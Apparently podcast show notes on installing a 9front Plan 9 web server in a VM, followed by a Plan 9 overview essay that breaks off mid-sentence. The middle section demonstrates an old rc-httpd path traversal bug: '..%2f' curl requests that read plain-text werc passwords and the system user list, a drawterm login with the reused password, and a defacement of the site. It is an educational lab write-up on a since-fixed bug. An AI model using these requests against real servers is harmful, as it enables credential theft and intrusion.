Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models Installing Plan 9 with libvirt [root@localhost]# virt-install -n 9pwn --description "pre-patched rc-httpd" --osinfo=unknown --memory=4096 --vcpus=4 --disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 --graphics spice --cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso --network bridge=virbr0 [root@localhost]# virt-viewer 9pwn How I find the IP of my guests and add it to my /etc/hosts for faster access. [root@localhost]# virsh domiflist 9pwn Interface Type Source Model MAC ---------------------------------------------------------- vnet3 bridge virbr0 e1000 52:54:00:43:8a:50 [root@localhost]# arp -e | grep 52:54:00:43:8a:50 192.168.122.20 ether 52:54:00:43:8a:50 C virbr0 [root@localhost]# echo cirno 192.168.122.20 >> /etc/hosts Proceed as normal with a 9 installation Set up CPU server with rc-httpd and werc I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it's fine) I've snarfed+pasted it here for the sake of completeness and modified it slightly so that it's more accessible for other people. I've also revised these notes so that they're less-broken. I may or may not update them. I'm using 9front for this. It has more secure authentication protocols when it comes to remotely connecting. Configuring a CPU server Add users to file server Connect to the file server and add a new user called who is in the groups sys, adm, and upas term% con -C /srv/cwfs.cmd newuser newuser sys + newuser adm + newuser upas + Reboot and set user= when prompted at boot time. Configure user's environment This is similar to cp -r /etc/skel /home/ on a UNIX system. /sys/lib/newuser Configure headless booting Mount the boot partition: term% 9fs 9fat edit the boot config, /n/9fat/plan9.ini bootfile=9pc64 nobootprompt=local!/dev/sdC0/fscache mouseport=ps2 monitor=vesa vgasize=1024x768x14 user= tiltscreen=none service=cpu Add hostowner info to nvram Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our bootprompt sets the hostowner. For automatic booting (aka not entering a password at the physical machine every time we power it in), we need to add the hostowner's key to nvram. term% nvram=/dev/sdF0/nvram auth/wrkey bad nvram des key bad authentication id bad authentication domain authid: authdom: cirno secstore key: password: Configure auth server In order to connect to the system over the network, the new user must be added to the auth server. term% auth/keyfs term% auth/changeuser Password: Confirm password: Assign new Inferno/POP secret? [y/n]: n Expiration date (YYYYMMDD or never) [never]: never Post id: User's full name: Department #: User's email address: Sponsor's email address: user installed for Plan 9 Configure permissions /lib/ndb/auth is similar to a /etc/sudoers. This configuration for the new user allows him to execute commands as other users except for the sys and adm users (but sys and adm are more like groups but who cares). append to /lib/ndb/auth hostid= uid=!sys uid=!adm uid=* then reboot Test if it worked with drawterm The 9front version of drawterm must be used as it supports the better crypto in 9front. Other drawterm versions probably won't work. $ /opt/drawterm -u -h example.com -a example.com -r ~/ Configure rc-httpd edit /rc/bin/rc-httpd/select-handler this file is something like /etc/httpd.conf on a UNIX system. #!/bin/rc PATH_INFO=$location switch($SERVER_NAME) { case example.com FS_ROOT=/sys/www/$SERVER_NAME exec static-or-index case * error 503 } To listen on port 80 and run the handler on port 80: cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80 cpu% chmod +x /rc/bin/rc-httpd/select-handler Reboot and test. SSL I will never give money to the CA racket. Self-signed is the way to go on systems that don't support acme.sh, the only ACME client I use for obtaining free SSL certs. Generate and install: cpu% ramfs -p cpu% cd /tmp cpu% auth/rsagen -t 'service=tls role=client owner=*' > key cpu% chmod 600 key cpu% cp key /sys/lib/tls/key cpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert cpu% mkdir /cfg/$sysname cpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart Now add a listener in /rc/bin/service/tcp443: #!/bin/rc exec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $* And make it executable: cpu% chmod +x /rc/bin/service/tcp443 Install and configure werc cpu% cd cpu% mkdir /sys/www && cd www cpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz > werc-1.5.0.tgz cpu% tar xzf werc-1.5.0.tgz cpu% mv werc-1.5.0 werc # ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK # EG. DIRDIR, BLAGH, ETC # DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK # HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK # PLEASE I BEG YOU cpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i cpu% cd werc/sites/ cpu% mkdir example.com cpu% mv default.cat-v.org example.com now re-edit /rc/bin/rc-httpd/select-handler #!/bin/rc WERC=/sys/www/werc PLAN9=/ PATH_INFO=$location switch($SERVER_NAME){ case cirno FS_ROOT=$WERC/sites/$SERVER_NAME exec static-or-cgi $WERC/bin/werc.rc case * error 503 } Test the website. Werc is fiddly. Werc is archaic. Werc is fun. Path traversal vulnerabilities in old versions of rc-httpd Using release COMMUNITY VS INFRASTRUCTURE, an old release with old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases. The vulnerability # get list of werc admin users [root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members pwn # get that werc user's password [root@localhost]# http://cirno/..%2f..%2f/etc/users/pwn/password supersecret Wait, the passwords for werc are stored in plain text? Let's log in [root@localhost]# firefox http://cirno/_users/login Now let's see if any of the werc users are also system users: # let's enumerate users [root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users -1:adm:adm:glenda,pwn 0:none:: 1:tor:tor: 2:glenda:glenda: 3:pwn:pwn: 10000:sys::glenda,pwn 10001:map:map: 10002:doc:: 10003:upas:upas:glenda,pwn 10004:font:: 10005:bootes:bootes: Let's hope that no one is re-using credentials. Let's check just to be sure $ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G cpu% cat /env/sysname cirno cpu% This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and share login/passwords How the static-or-cgi handler works rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script. I will compile these archaic rc scripts into pseudo code for the listener. The static-or-cgi handler (the handler specified in the httpd config) is simple: #!/bin/rc cgiargs=$* fn error{ if(~ $1 404) exec cgi $cgiargs if not $rc_httpd_dir/handlers/error $1 } if(~ $location */) exec cgi $cgiargs if not exec serve-static If the requested file exists, call the cgi handler and pass it arguments. If the requested file does not exist, call the serve-static handler. How the serve-static handler works The problem lies in the serve-static handler: #!/bin/rc full_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d} full_path=$"full_path if(~ $full_path */) error 503 if(test -d $full_path){ redirect perm $"location^'/' 'URL not quite right, and browser did not accept redirect.' exit } if(! test -e $full_path){ error 404 exit } if(! test -r $full_path){ error 503 exit } do_log 200 switch($full_path){ case *.html *.htm type=text/html case *.css type=text/css case *.txt *.md type=text/plain case *.jpg *.jpeg type=image/jpeg case *.gif type=image/gif case *.png type=image/png case * type=`{file -m $full_path} } if(~ $type text/*) type=$type^'; charset=utf-8' max_age=3600 # 1 hour echo 'HTTP/1.1 200 OK'^$cr emit_extra_headers echo 'Content-type: '^$type^$cr echo 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr echo 'Cache-control: max-age='^$max_age^$cr echo $cr exec cat $full_path encode the full file path into a url if the url points to a file outside of '*/', the document root, error 503 if the url is broken, exit if the url points to a file that neither exists nor is readable, error 503 if you haven't exited by now, serve the file The problem is no sanitization. The script checks for files in the current directory BUT NOT BEFORE ENCODING THE URL STRING. The urlencode command works by decoding encoded characters. cpu% echo 'http://cirno/..%2f' | urlencode -d http://cirno/../ Does ../ exist in */ ? the answer is yes. .. is a directory contained inside of */ */../ is the current working directory. How they fixed it Adding a sanitizer. By comparing the encoded url against an actual hypothetical file path and exiting if there is a mismatch, all %2f funny business is avoided. Other (optional) bad config options in werc rc-httpd aside, a bad werc config can still lead to website defacement if your non rc-httpd webserver has a path traversal vulnerability. Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd to write to disk. rc-httpd runs as the none user so it's not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it's the worst idea in the history of all time ever. I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that's what the wordpress installation guide told me to do so I could have a cool and easy way to modify my website from the browser. Let's pretend that I'm not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled. # get config [root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config masterSite=cirno siteTitle='Werc Test Suite' conf_enable_wiki wiki_editor_groups admin Hmmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let's modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability. [root@localhost]# curl -s cirno | pandoc --from html --to plain quotes | docs | repo | golang | sam | man | acme | Glenda | 9times | harmful | 9P | cat-v.org Related sites: | site updates | site map | Werc Test Suite - › apps/ - › titles/ SECURITY ADVISORY: lol this guy still hasn't figured out the ..%2f trick Powered by werc Modifying werc to support password hashing Adding password hashes isn't too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc % echo 'supersecret' | sha1sum -2 512 Private namespaces to the rescue Luckily enough, the webserver runs as the none user with it's own namespace. Comparing the hostowner's namespace and none user's namespace I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences. cpu% ns | sort > cpu.ns cpu% ps -a | grep -e 'listen.*80' | grep -v grep none 355 0:00 0:00 132K Open listen [/net/tcp/2 tcp!*!80] cpu% ns 355 | sort > listen.ns cpu% diff -u listen.ns cpu.ns --- listen.ns +++ cpu.ns @@ -6,17 +6,29 @@ bind /amd64/bin /bin bind /mnt /mnt bind /mnt/exportfs /mnt/exportfs +bind /mnt/temp/factotum /mnt/factotum bind /n /n bind /net /net bind /root /root +bind -a '#$' /dev bind -a '#I' /net +bind -a '#P' /dev +bind -a '#S' /dev bind -a '#l' /net +bind -a '#r' /dev +bind -a '#t' /dev +bind -a '#u' /dev +bind -a '#u' /dev bind -a '#¤' /dev bind -a '#¶' /dev +bind -a '#σ/usb' /dev +bind -a '#σ/usbnet' /net bind -a /rc/bin /bin bind -a /root / +bind -b '#k' /dev bind -c '#e' /env bind -c '#s' /srv +bind -c /usr/pwn/tmp /tmp cd /usr/pwn mount -C '#s/boot' /n/other other mount -a '#s/boot' / @@ -26,4 +38,4 @@ mount -a '#s/slashmnt' /mnt mount -a '#s/slashn' /n mount -aC '#s/boot' /root -mount -b '#s/factotum' /mnt +mount -b '#s/cons' /dev The major difference is that the hostowner (equivalent to root user) has a lot more things bound to his namespace: '#$' PCI interfaces '#P' APM power management '#S' storage devices '#r' realtime clock and nvram '#t' serial ports '#u' USB '#σ' /shr global mountpoints '#k' keyboard /tmp directories '#s' various special files relating to services The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none. Closing An argument could be maid that the rc-httpd vulnerability was "not a bug" because "namespaces are supposed to segregate the system". I disagree on this point. Namespaces are good and all but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwnd in spite of these security methods is still possible; all user input is dangerous and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system. For example, when I write PHP applications, I consider things in this order: don't pass unnecessary resources into the document root via symlinks, bind mounts, etc. never ever use system() in a context where user input can ever be passed to the function in order to avoid shell escapes sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements. fire up a kali linux vm and beat the test server half to death iterate upon my ignorance doubly verify DAC just to be sure re-check daemon configs to make sure I'm not doing anything stupid FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key based ssh authentication, sshd configurations that don't make it possible to enumerate users, rate limiters, etc. Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through this filter. Although no system is perfectly safe from three letter agencies, a system with multiple layers of security is typically safe from drive-by attacks. Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You'll be surprised when even MAC doesn't protect your system. Even now, after spending almost a month and a half worth of after work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single layer security models? What can we do to improve the system? Plan 9 is perfect for this type of research. I'm considering writing an httpd in C and a werc-like (minus the parts I don't like) in C and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin in order to reduce the possibility of a shell escape. I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad. And my final thought: Criticism: This program/OS/whatever sucks Response: I know, help me fix it.
Plan 9: An exercise in futility It is my right to exercise my futility wherever, whenever, and with whoever I please Some ideas about Plan 9: It's like the uncanny valley of UNIX Cool, but useless Can you sum up plan 9 in layman's terms? It does everything Unix does only less reliably - Ken Thompson If you cannot imagine a use for a computer that does not involve a web browser, Plan 9 may not be for you - 9front FQA #d/0:28: null list in concatenation History and description The boys at bell labs decide UNIX wasn't good enough so they decided to build something better: a distributed multiuser operating system composed of many machines. Many of the same ideas behind UNIX were pushed to absurd extremes. The idea that "everything is a file" is made blatantly apparent to everyone and sometimes, in my opinion, can feel 'overly-abstracted'. Additionally, the concept of private namespaces makes the concept of virtual filesystems seem like 'baby's first filesystem abstraction'. Just like UNIX, 9 started as a research operating system. Both are enjoyed by hobbyists, both are interesting ways of using a computer, both have a lot of fun in store. But the systems do diverge in one major aspect: UNIX is mainstream and 9 is still a research operating system. Plan 9 is currently distributed under the MIT license. "What is plan 9?", Taken directly from intro(1): Plan 9 is a distributed computing environment assembled from separate machines acting as terminals, CPU servers, and file servers. A user works at a terminal, running a window system on a raster display. Some windows are connected to CPU servers; the intent is that heavy computing should be done in those windows but it is also possible to compute on the terminal. A separate file server provides file storage for terminals and CPU servers alike. In practice, modern 9 users just run all of these services on a single machine because maintaining many machines to achieve a single usable 'operating system' is unnecessary; the 9 user finds himself scared and alone without enough users (1 is rarely enough) to justify building a distributed environment. Use cases Intended: distributed multiuser network (ie not mainframe), later embedded since UNIX was too bad to be stopped Actual: Acting like a UNIX hipster, pretending that 9 is anything other than vaporware, imagining that you are gaining social credit by posting screenshots of abandonware on internet forums. See also: Operating System Tourism 9 in the wild Unicode is now a plague rfork 9p leveraged by microsoft to discourage end users from actually running GNU+Linux as St Ignucius intended QEMU's VirtFS various window managers for UNIX, written by people who like the ideas behind 9 but not enough to actually run 9 "cool idea, I'm adding it to Linux" private namespaces union directories see: docker Design The goal of 9 was to build a distributed operating system that expands upon Unixy ideas, not to build something that's backwards compatible. "We want to improve UNIX" is mutually exclusive to "we want to port UNIX to this wacky new kernel". UNIX programs (and behemoths like FireFox) are difficult^impossible to port to 9 because of this design decision. Distributed operating systems Since 9 was designed to be a distributed operating system, many of the internals are oriented towards networking. On a single system installation, all three of the components that make a 9 network are working together in a client-server model. The filesystem is presented as a service, the CPU is presented as a service, and the terminal is presented as a service. This type of "abstraction from the physical hardware" makes it difficult to succinctly describe and explain 9. If you think about 9 as a heterogeneous network of machines the ideas start to make sense. If you think about 9 as a self-contained single-machine operating system the ideas only become more confusing. One thing that has helped me wrap my head around the client/server idea is actually thinking less. When running a MySQL server in a LAMP stack, the database server and client are running on the same machine. When writing a program, you instruct the client to access the database located at the address localhost. Despite the design intention to run the database as a separate machine, loopback device hacks ensue. The idea of client/server permeates 9. The filesystem? Presented as a server regardless of what physical machine it's located on. The CPU? Presented as a server regardless of what physical machine it's located on. The terminal? Presented as a server regardless of the physical machine it's located on. On a single machine 9 installation, all of these servers are running locally but accessed as if they were running remotely. Insanity ensues but at least it's easier to write code for. 9p: the Plan 9 Filesystem Protocol 9p is a networking protocol that makes this client/server model possible. Internally, the filesystem is served to the client over 9p. Many applications make use of 9p, including text editors, windowing systems, plumber, etc. In UNIX, everything is a file. In 9, everything is a filesystem accessed via 9p. Private Namespaces, Union Directories The most important aspect of 9: namespaces. Namespaces have caused me much confusion until recently. In 9, each process constructs a unique view of the filesystem. The phrase that gets stuck in my head is "a private namespace is a per-process view of the filesystem". The easiest way to think about namespaces is to think about a "virtual directory". Unix has "virtual filesystems", 9 has "virtual directories". The concept of namespaces allows a user to pull resources from all over the network and present them as "a single local filesystem" with absolute disregard for where these resources are actually coming from. In order to construct a namespace, union directories are used. A union directory is a directory made of several directories bound to the same directory. This concept is similar to a bind mount on UNIX. The kernel keeps separate mount table for each process. Using namespaces, a user or admin can create more secure isolated environments (similar to a chroot). Processes and their children are grouped together so that inheritance of the namespace occurs. These process groups can be customized. The 'per-process namespace' concept can be confusing to UNIX users at first, especially when binding (ie mounting) resources. When I first started using 9 I was very confused when I bound something in one terminal, switched to another, then became disoriented as the thing I just bound seemingly stopped existing. My big example is mounting the boot partition or a filesystem over ssh: # In this window, I have bound the boot partition. # It behaves expectedly. term% 9fs 9fat term% lc /n 9/ 9fat/ other/ ssh/ term% lc /n/9fat 9bootfat 9pc64 oldplan9.ini plan9.ini 9pc efi/ pbs.bak term% # In this other window, the boot partition doesn't seem to be mounted. # This causes much confusion for the end user. term% lc /n 9/ 9fat/ other/ ssh/ term% lc /n/9fat term% Files The second most important aspect of 9: "Everything is a file" taken to absurdist absolutes. The kernel presents hardware devices as files bound to /dev. Within the namespace, devices are just files. Outside the namespace, devices are named with a leading # to help distinguish between pseudo-files and devices. These physical devices are bound to /dev/ and presented as files for easy administration, access, and programming. Presenting everything as a file accessible via 9p greatly reduces the total number of system calls. Examples of "Everything is a file": # The clipboard in 9 is called /dev/snarf # We can easily write and read from this clipboard term% cat /dev/snarf SYNOPSIS #include #include #include term% term% fortune > /dev/snarf term% cat /dev/snarf If at first you succeed, try to hide your astonishment. term% # The display in 9 is called /dev/screen # We can easily take a screenshot term% file /dev/screen /dev/screen: plan 9 image, depth 32, size 1366x768 term% cat /dev/screen | topng > screenshot.png term% file screenshot.png screenshot.png: PNG image term% Message oriented filesystem Continuing with the idea that "everything is a filesystem", processes can offer services to other processes by placing virtual files into other processes' namespaces. File I/O on this special virtual file becomes interprocess communication. This is similar to a UNIX socket but significantly less difficult to program against because all of the hard parts have been abstracted: it's just simple file I/O. Virtual filesystem (with more special files) The /proc filesystem presents processes as a files in a filesystem. This makes writing programs that manage process extremely easy by reducing the total number of system calls to simple file I/O. The /proc filesystem allows users to manage processes using standard command line utilities like cat(1) and ls(1). Linux borrowed the idea of a /proc filesystem. Unicode Although the implementation is not fully internationalized, UTF-8 is fully there. Unicode is fully backwards compatible with ASCII. Thanks to ⑨, we now have people writing exclusively with primitive hieroglyphics instead of words. Portability Just like UNIX, 9 was designed with portability in mind. 9 is written in a strange dialect of ANSI C which means it's portable. Although the system is self hosting, images are rarely built on a self hosting environment. Instead, the end user will download a generic amd64 or i386 image, cross compile for the obscure target architecture, wrap it up in an install image, then burn that image to an install disk. After installation, it is generally a good idea to recompile the entire operating system so that your copy is self-hosted. The compiler suite is quite clever in that each compiler is named according to the target architecture, the object files are named according to the target architecture, etc. The alnum prefix/extensions are also shared by the various linkers and assemblers. 0c spim little-endian MIPS 3000 family 1c 68000 Motorola MC68000 2c 68020 Motorola MC68020 5c arm little-endian ARM 6c amd64 AMD64 and compatibles (e.g., Intel EM64T) 7c arm64 ARM64 (ARMv8) 8c 386 Intel i386, i486, Pentium, etc. kc sparc Sun SPARC vc mips big-endian MIPS 3000 family Filesystems Multiple filesystems are supported, most suck. The only one the average tourist has heard of is FAT. The one I use is cwfs64x(4). cwfs is a strange filesystem. Every night, it makes a dump of the filesystem. You can access these dumps by running: 9fs dump cd /n/dump/YYYY/MMDD/ And, managing the file server (trying to uncorrupt cwfs), all while the kernel is spraying error messages term% con -C /srv/cwfs.cmd help check tag check ream check free check After my system crashes, and after consulting fs(8), the above commands seem to solve my corruption problems. Not always. But sometimes. The cache is a WORM: Write Once Read Many filesystem. Traditionally, the "fast" hard drives would be backed up to tape archives. In the modern era, we have a WORM partition. The worm partition stores data forever so it will eventually get full and need cleaning. It is possible to run without a WORM but it's a bad idea. Built in version control. Data integrity not guaranteed. Secstore stores various passwords to nvram. BIOS integrety not gauranteed. If you don't like thrashing the nvram and it's limited write ops, an partition can be created and mouted as if it were nvram. Factotum stores various passwords in memory (like ssh-agent) Known forks Dead: Plan 9 From Bell Labs (also called 'Labs 9', the original) 9atom (even the domain has expired) Akaros Harvey (attempt to port 9 to GCC/Clang) NIX jehanneOS node9 inferno (in permanent limbo) Life Support: 9front (actively developed, many QOL patches) 9legacy (patches applied to Labs9) Plan 9 From User Space (also called 'plan9port', you will be laughed at) 9front is really the only 'usable' one because the QOL modifications add important things like general stability, git client, mercurial, ssh, various emulators, audio, WiFi, and USB support. Using 9 What does the 9 experience actually look like in 2022? You put 9 in a VM, posted a screenshot, shutdown the VM, then continued using Ubuntu because you can't play video games or easily watch videos online in 9. Hardware support in 9front is expanding but still limited. Refer to the list of supported hardware. I run 9front on a Thinkpad x220 and it seems to just work. Some people run it on a Raspi but I'm not sure why. It works quite well with KVM and QEMU if you're an OS tourist. I see no reason to add a dmesg because it will either work or it won't. Available software GNU might not be UNIX but 9 isn't even trying to be UNIX-like. GUI Unlink UNIX, 9 was designed with graphics in mind. Some people have said that the 9 GUI looks similar to a smalltalk machine but I think it's just the only good stacking window manager. A three button mouse is necessary for using 9front. Shift-rightclick emulates middle click. Rio Rio is the Plan 9 windowing system. It's the successor to 8½ window manager. Rio is lightweight compared to X11 because access to graphical hardware is built into the kernel and using files+namespaces to access input devices. The most brief way of explaining rio is to think of it as a rectangle multiplexer, where each rectangle is served a file interface (9p). Although rectangles might seem counterintuitive at first, thinking less hard makes it easier to use. I still have difficulty efficiently using a mouse-centric interface after using terminal interfaces almost exclusively for many years. I dislike the windows way of using a mouse but the 9 way seems to make quite a lot of sense when I "think less hard" and allow the intuition to take control. The argument for mouse-centric computing and text editing is that it's faster. Of course, the average vim user is editing text faster than the speed of thought but most people aren't the average vim user. Instead, they only know how to use arrow keys to move a cursor. Without memorizing hundreds of vim bindings (and forgetting the names and birth dates of your family members in the process), obviously a mouse is faster. Mouse controls are confusing at first because they follow the "click and hold, hover to option, release" to select an option. They look something like follows: Right click (window management controls) New Resize Move Delete Hide Middle click (text manipulation controls) cut paste snarf (copy highlighted text) plumb (send highlighted text to process, or, more effectively: open file with appropriate program) look (search for highlighted text) send (run highlighted text as a shell command) scroll (toggle autoscroll/noautoscroll) The left click button is used to select text and windows. The concept of mouse-chording is also prominent in rio but it's even more difficult to explain without a visual demonstration. Rio and it's windows also support UNIX style keyboard shortcuts: ^-u deletes from cursor to start of line ^-w deletes word before cursor ^-h deletes the character before the cursor ^-a moves the cursor to the start of the line ^-e moves the cursor to the end of the line ^-b moves the cursor back to the prompt ^-f is the autocomplete key, functionally equivalent to tab completion ^? (DEL key) is the equivalent to ^-c on UNIX Additionally, in a text window, the arrow keys and PgUp/PgDown keys behave as expected. The home/end keys scroll the window to the top/bottom of the text buffer respectively. These text windows have a built in pager so there is no more or less command. I can't decide if I like built in paging but it's definitely a thing to think about. The colorscheme of rio is dull and pastel and this is intentional. Less vibrant color schemes seem to fade away and become less obvious. Color themes like Tango, Linux Console, Solarized, all of KDE, and WIndows XP are very obvious but not in a good way. Bright colors are subtly distracting and make it difficult to concentrate. When I'm configuring a UNIX system with dwm, I borrow Rio's color theme because it's an anti-theme. Give it time. It's charming in it's own way. Modifying the source code for rio allows for custom color themes. It's possible but you will be laughed at. Setting a wallpaper is also possible but I don't do this because my windows are always covering the dull gray background. As for X11, the equis X11 server can only be run via linux compat layers. The lack of a viable X server is yet another reason 9 has no programs. Command Line Utilities The shell on 9 is called rc(1). It's like any other shell you've used except that you expect it to be bourne-like but it isn't. Standard UNIX shell concepts like pipes, file redirects, && and ||, etc. Scripting is not POSIX-like at all so reading the man page and various scripts written in rc is the only way to learn. Other various UNIX utilities exist and function as expected (although some of the ones you would like are missing). awk, grep, sed, cat, tar, gzip, ed, etc are present. Editors There are three primary ways of editing text on 9: ed(1), sam(1), and acme(1). There is no vi aside from the MIPS emulator, there is no emacs except for a man page explaining why there is no emacs. I have primarily used acme in the past, but sam is a much better editor. sam is a lot like a graphical version of ed. I still need to learn ed because it's the standard editor. Some of the standard vi commands are available and regex works. I like sam quite a lot but it seems to corrupt files when the system crashes. acme is a window manager, file browser, terminal emulator, and email client that some people use as a text editor. The coolest part about acme is the ability to write arbitrary editor and system commands in the menu bar, highlight them, then middle click to execute those commands. (Some of the ) Supported Networking Protocols IMAP good luck NTP IRC ircrc other non-default implementations exist FTP HTTP mothra is the standard web browser. It does not support CSS or all of the HTML tags. Obviously, javascript is unsupported. abaco exists. I've used it a few times. It renders slightly better than mothra but is a pain to use. Various inferno vaporware exists but the ports don't work NetSurf has been ported to 9front by leveraging components of APE. It almost works hget, like curl SSH it only works in conjunction with the vt(1) command. sshfs sshnet for proxying traffic VNC Various torrent software (magnet links not supported) Drawterm no, good luck, you will be laughed at Of course, 9p A Security aside Various server implementations for these protocols exist but you really shouldn't use them on the WAN as they are ancient, unmaintained, unaudited, and easy to exploit. Prime example: the /g/entoomen found a path traversal vulnerability in the 9front httpd server, then leveraged that vuln to exploit a vuln in the authentication system. Not that the boys back home did anything malicious with this bug . . . but the ability to pwn a system by sending cleverly crafted GET requests should tell you enough about the current state of security in 9. Firewall no Disk Encryption unreliable Access control what? filesystem cwfs has an poorly documented special user called none that is allowed to connect to fossil, cwfs, and maybe hjfs without a password. Set the nonone option in cwfs if you are even thinking about putting 9 on the internet. Don't even think about putting 9 on the internet UNIX compat layer (ape) APE is the ANSI POSIX Emulator. It doesn't work and is almost entirely empty. Lots of tiny programs to write, not much interest in writing lots of tiny program. There is a general attitude among 9 users that "9 is unique" porting POSIX libs to 9 would ruin the appeal. I almost think I agree with this sentiment. Emulation Linux don't GameBoy GameBoyAdvance NES SNES Sega MegaDrive/Genesis c64 vmx, a PC emulator (effectively virtualization) It's slow it almost works it crashes your system cwfs gets corrupted "runs" OpenBSD, Linux, and ancient Windows with graphics support and also various emulators for obscure architectures VCS Mercurial used to come with 9front but it has been removed. CVS does exist but not in the base system. A native git implementation exists and is in the base system. It's bare bones but it mostly works. Community Maintained Software The 9front community has been collecting known programs for some time and various other community software can be found in the wiki. Both are served as a ports system, similar to a BSD style ports system. There are no binary packages. Makefiles are broken. Programming Languages mkfiles 9 ships a program called mk(1). Syntax (in the simplest ways) is identical to UNIX make(1). The Absurdities of 9 C Plan 9 C is syntactically similar to ANSI C but it varies. The stdlibs on 9 are much simpler than the POSIX monster. /* POSIX C example */ #include int main(){ printf("hello, worldn"); return 0; } /* 9 C example */ #include #include void main(){ print("hello, worldn"); exits(0); } u.h contains CPU specific instructions, libc.h contains all of the system calls, time functions, math functions, unicode functions, and print functions. In contrast to POSIX, functions in 9c return strings instead of ints. # Compiling on UNIX $ cc main.c $ ./a.out hello, world $ # Compiling on 9 % 6c main.c % 6l main.6 % 6.out hello, world % In the 9 compiler example, I'm using the amd64 compiler and linker. Notice how the 6 persists as the prefix/suffix to help developers remember which architecture this specific program is written for. Instead of unspecific object files with a .o suffix, the object file's suffix is actually representative of what types of opcodes the file contains. Similarly, after linking, the 6. prefix tells us that the binary is for an amd64 processor. And also, the simplest UNIX program with buffers: read from stdin and write directly to stdout: /* POSIX C */ #include int main(int argc, char *argv[]){ char buf[32]; size_t bufs = sizeof(char)*32; size_t nread = 0; while((nread = fread(buf, 1, bufs, stdin)) > 0){ fwrite(buf, 1, nread, stdout); } return 0; } /* Plan 9 C */ #include #include void main(int argc, char *argv[]){ char buf[32]; char bufs = sizeof(char)*32; int nread = 0; while((nread = read(0, buf, bufs)) > 0){ write(1, buf, nread); } exits(0); } In 9, stdin is file descriptor 0, stdout is 1, and stderr is 2. And, the binary sizes betwen the two. You probably recognize a.out, this one was compiled with GCC. 6.out is an amd64 Plan 9 binary compiled on 9. $ ls -sh ./*.out 4.0K ./6.out 28K ./a.out Binaries on plan 9 are statically linked. It's somewhat strange to see that a statically linked binary is smaller than a dynamically linked one. Even compiling the plan 9 source on Linux using plan9port yeilds a large binary: 40K. I have not written 9C in a long time so I cannot say much more with confidence and authority. Refer to C Programming in Plan 9 from Bell Labs for more information. The acid(1) debugger exists but it's hard to use if you're not fluent in assembly. Ancient Go Ancient Go once ran on 9. In 2022, you're better off just writing C and rc. WiFi Some wifi cards are supported on 9front. My thinkpad x220 uses the iwl drivers. The FQA is somewhat vague when it comes to actually using the drivers. Good luck :) Why isn't 9 more popular if it supposedly improves on "bad Unix ideas"? Unix is 'just good enough' 9 is not 'better enough' to beat out 'just good enough' Porting software is difficult^impossible because 9 was deliberately written to be not backwards compatible. "If you port it, they will come" 9 is uncomfortable to use if you have Unix muscle memory no modern web browser no video games (I'm pretty sure there are doom and quake source ports though) multimedia consumption is hard no GNU Why do people use 9 if it's so bad? I can't be sure about all other ~20 Plan 9 fans in the world, but for myself, it's purely out of a genuine curiosity and love for computing. My motivation for learning obscure, unnecessary, and quite frankly boring things related to computers is that it brings me some sense of 